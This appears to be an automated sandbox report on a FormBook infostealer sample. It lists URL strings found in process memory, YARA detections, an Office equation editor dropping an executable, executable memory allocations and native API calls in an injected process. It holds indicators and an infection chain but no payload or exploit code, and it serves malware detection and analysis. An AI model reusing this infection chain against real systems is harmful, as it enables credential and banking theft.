        Source: explorer.exe, 00000006.00000000.2119295194.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
        Source: explorer.exe, 00000006.00000000.2117989946.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
        Source: explorer.exe, 00000006.00000000.2129984121.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
        Source: 69577.exe, 00000004.00000002.2114089575.00000000059C0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2112769729.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2119295194.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2117989946.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
        Source: explorer.exe, 00000006.00000000.2119295194.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
        Source: explorer.exe, 00000006.00000000.2117422118.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
        Source: explorer.exe, 00000006.00000000.2117422118.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
        Source: explorer.exe, 00000006.00000000.2117422118.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpXm
        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
        Source: explorer.exe, 00000006.00000000.2117422118.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
        Source: explorer.exe, 00000006.00000000.2126009473.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
        Source: explorer.exe, 00000006.00000000.2118547561.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
        Source: explorer.exe, 00000006.00000000.2126009473.000000000861C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
        Source: explorer.exe, 00000006.00000000.2125582334.0000000008471000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: https://pki.goog/repository/0
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
        Source: 69577.exe, 00000004.00000002.2111230551.0000000002241000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
        Source: 69577.exe, 00000004.00000002.2111230551.0000000002241000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com(
        Source: 69577.exe, 00000004.00000002.2111230551.0000000002241000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/

        E-Banking Fraud:

        barindex
        Yara detected FormBookShow sources
        Source: Yara matchFile source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPE

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
        Source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\69577.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-50230[1].pdfJump to dropped file
        Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
        Source: C:\Users\Public\69577.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\Public\69577.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009A070 NtClose,5_2_0009A070
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009A120 NtAllocateVirtualMemory,5_2_0009A120
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00099F40 NtCreateFile,5_2_00099F40
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00099FF0 NtReadFile,5_2_00099FF0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009A06C NtClose,5_2_0009A06C
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009A11C NtAllocateVirtualMemory,5_2_0009A11C
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00099F3B NtCreateFile,5_2_00099F3B
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00099FEA NtReadFile,5_2_00099FEA
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008400C4 NtCreateFile,LdrInitializeThunk,5_2_008400C4
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00840048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00840048
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00840078 NtResumeThread,LdrInitializeThunk,5_2_00840078
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083F9F0 NtClose,LdrInitializeThunk,5_2_0083F9F0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083F900 NtReadFile,LdrInitializeThunk,5_2_0083F900
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_0083FAD0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0083FAE8
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FBB8 NtQueryInformationToken,LdrInitializeThunk,5_2_0083FBB8
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FB68 NtFreeVirtualMemory,LdrInitializeThunk,5_2_0083FB68
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FC90 NtUnmapViewOfSection,LdrInitializeThunk,5_2_0083FC90
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FC60 NtMapViewOfSection,LdrInitializeThunk,5_2_0083FC60
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FD8C NtDelayExecution,LdrInitializeThunk,5_2_0083FD8C
